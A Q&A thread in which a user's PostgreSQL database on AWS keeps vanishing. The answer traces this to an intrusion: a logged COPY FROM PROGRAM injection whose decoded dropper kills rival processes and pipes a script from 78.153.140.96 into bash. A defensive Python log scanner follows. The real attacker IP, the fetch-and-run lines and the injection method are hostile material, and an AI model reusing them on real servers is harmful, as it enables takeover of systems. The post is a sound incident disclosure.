Tags: postgresql, amazon-web-services, ubuntu, amazon-ec2, tablespace

Missing user db on Postgresql AWS?


Why is my test user DB missing so often?

I'll leave my AWS instance stopped overnight and then restart it in the morning. But then I'm not able to log in w/ my jdtest user account!

I keep getting the following in my system log

/var/lib/postgresql/log/postgresql-16-main.log

    LOG:  starting PostgreSQL 16.3 (Ubuntu 16.3-0ubuntu0.24.04.1) on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 13.2.0-23ubuntu4) 13.2.0, 64-bit
    LOG:  listening on IPv4 address "0.0.0.0", port 5432
    LOG:  listening on IPv6 address "::", port 5432
    LOG:  listening on Unix socket "/var/run/postgresql/.s.PGSQL.5432"
    LOG:  database system was shut down at 2024-06-06 15:42:30 UTC
    LOG:  database system is ready to accept connections
    jdtest@jdtest FATAL:  database "jdtest" does not exist
    jdtest@jdtest FATAL:  database "jdtest" does not exist

The only way I can fix this is to reissue:

    CREATE USER jdtest createdb login PASSWORD 'jdtest' ;
    CREATE DATABASE jdtest owner jdtest;
    GRANT ALL PRIVILEGES ON DATABASE jdtest TO jdtest;

But then the same problem keeps happening. :-(

Is there some kind of impermanence in the default AWS instance that, as a noob, I'm missing? Should I create some kind of (more permanent??) AWS datastore and an associated postgres tbs??

Notes:

Solution

  • Per above convo w/ jarmod & Klaver, I found the following in the postgresql system log:

    2024-06-01 20:47:59.304 UTC [183888] pgg_superadmins@postgres STATEMENT:  DROP TABLE IF EXISTS CGTmqavu;CREATE TABLE CGTmqavu(cmd_output text);COPY CGTmqavu FROM PROGRAM 'echo IyEvYmluL2Jhc2gKcGtpbGwgLWYgenN2Ywpwa2lsbCAtZiBwZGVmZW5kZXJkCnBraWxsIC1mIHVwZGF0ZWNoZWNrZXJkCgpmdW5jdGlvbiBfX2N1cmwoKSB7CiAgcmVhZCBwcm90byBzZXJ2ZXIgcGF0aCA8PDwkKGVjaG8gJHsxLy8vLyB9KQogIERPQz0vJHtwYXRoLy8gLy99CiAgSE9TVD0ke3NlcnZlci8vOip9CiAgUE9SVD0ke3NlcnZlci8vKjp9CiAgW1sgeCIke0hPU1R9IiA9PSB4IiR7UE9SVH0iIF1dICYmIFBPUlQ9ODAKCiAgZXhlYyAzPD4vZGV2L3RjcC8ke0hPU1R9LyRQT1JUCiAgZWNobyAtZW4gIkdFVCAke0RPQ30gSFRUUC8xLjBcclxuSG9zdDogJHtIT1NUfVxyXG5cclxuIiA+JjMKICAod2hpbGUgcmVhZCBsaW5lOyBkbwogICBbWyAiJGxpbmUiID09ICQnXHInIF1dICYmIGJyZWFrCiAgZG9uZSAmJiBjYXQpIDwmMwogIGV4ZWMgMz4mLQp9CgppZiBbIC14ICIkKGNvbW1hbmQgLXYgY3VybCkiIF07IHRoZW4KICBjdXJsIDc4LjE1My4xNDAuOTYvcGcuc2h8YmFzaAplbGlmIFsgLXggIiQoY29tbWFuZCAtdiB3Z2V0KSIgXTsgdGhlbgogIHdnZXQgLXEgLU8tIDc4LjE1My4xNDAuOTYvcGcuc2h8YmFzaAplbHNlCiAgX19jdXJsIGh0dHA6Ly83OC4xNTMuMTQwLjk2L3BnMi5zaHxiYXNoCmZp|base64 -d|bash';SELECT * FROM CGTmqavu;DROP TABLE IF EXISTS CGTmqavu;
    

    I believe I've been hacked. I took jarmod's suggestion:

    ubuntu@ip-69-31-71-83:~$ echo <base64 string from the log line above>|base64 -d
    
    #!/bin/bash
    pkill -f zsvc
    pkill -f pdefenderd
    pkill -f updatecheckerd
    
    function __curl() {
      read proto server path <<<$(echo ${1//// })
      DOC=/${path// //}
      HOST=${server//:*}
      PORT=${server//*:}
      [[ x"${HOST}" == x"${PORT}" ]] && PORT=80
    
      exec 3<>/dev/tcp/${HOST}/$PORT
      echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
      (while read line; do
       [[ "$line" == $'\r' ]] && break
      done && cat) <&3
      exec 3>&-
    }
    
    if [ -x "$(command -v curl)" ]; then
      curl 78.153.140.96/pg.sh|bash
    elif [ -x "$(command -v wget)" ]; then
      wget -q -O- 78.153.140.96/pg.sh|bash
    else
    

    I will rebuild the instance and restrict its security group to prevent access from the entire internet.

    p.s. https://askto.pro/question/how-to-make-postgresql-work-with-telegram-bot#

    https://cujo.com/blog/iot-malware-journals-prometei-linux/
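The manual review above (find the STATEMENT line, notice COPY ... FROM PROGRAM, decode the base64 without running it) can be scripted. What follows is an added example, not code from the asker or from this thread: it assumes the log line shape shown in the post, uses a constructed harmless payload in place of the real one, and only reports what it finds, so it is safe to run over a real log.

```python
# Added example (not from the post): flag COPY ... FROM PROGRAM in a PostgreSQL
# log, record the issuing role, and decode an inline base64 payload for triage.
import base64
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Line shape as in the post: "<date> <time> UTC [<pid>] <role>@<db> STATEMENT:  <sql>"
LINE_RE = re.compile(r"^\S+ \S+ \S+ \[\d+\] (?P<role>[^@\s]+)@(?P<db>\S+) STATEMENT:\s+(?P<sql>.*)$")
COPY_PROGRAM_RE = re.compile(r"COPY\s+\S+\s+FROM\s+PROGRAM\s+'((?:[^']|'')*)'", re.IGNORECASE)
B64_PIPE_RE = re.compile(r"echo\s+([A-Za-z0-9+/=]+)\s*\|\s*base64\s+(?:-d|--decode)")

@dataclass
class Finding:
    role: str                       # role that issued it (needs superuser or
    database: str                   # pg_execute_server_program to succeed)
    program: str                    # shell command the server was asked to run
    decoded_preview: Optional[str]  # first line of an inline base64 payload, if any

def decode_inline_payload(program: str) -> Optional[str]:
    """Return the first line of an `echo <b64>|base64 -d` payload, or None. Never executes it."""
    m = B64_PIPE_RE.search(program)
    if not m:
        return None
    try:
        text = base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError: malformed base64
        return None
    return text.splitlines()[0] if text else ""

def scan_log(lines: Iterable[str]) -> List[Finding]:
    """One Finding per COPY FROM PROGRAM found in STATEMENT log lines."""
    findings: List[Finding] = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # startup LOG lines and ordinary queries carry no STATEMENT prefix
        for prog in COPY_PROGRAM_RE.findall(m.group("sql")):
            findings.append(Finding(m.group("role"), m.group("db"),
                                    prog.replace("''", "'"), decode_inline_payload(prog)))
    return findings

# Constructed sample log; the payload is a harmless stand-in, not the one from the post.
SAMPLE_PAYLOAD = base64.b64encode(b"#!/bin/bash\necho constructed-sample\n").decode()
SAMPLE_LOG = [
    "2024-06-01 20:47:00.000 UTC [183880] app@appdb LOG:  statement: SELECT 1",
    "2024-06-01 20:47:59.304 UTC [183888] pgg_superadmins@postgres STATEMENT:  "
    "DROP TABLE IF EXISTS t;CREATE TABLE t(cmd_output text);"
    f"COPY t FROM PROGRAM 'echo {SAMPLE_PAYLOAD}|base64 -d|bash';SELECT * FROM t;",
]
```

Because COPY FROM PROGRAM requires superuser or pg_execute_server_program, any hit whose role is not one you administer is a sign that a privileged account was reachable from outside, which is what the security-group change addresses.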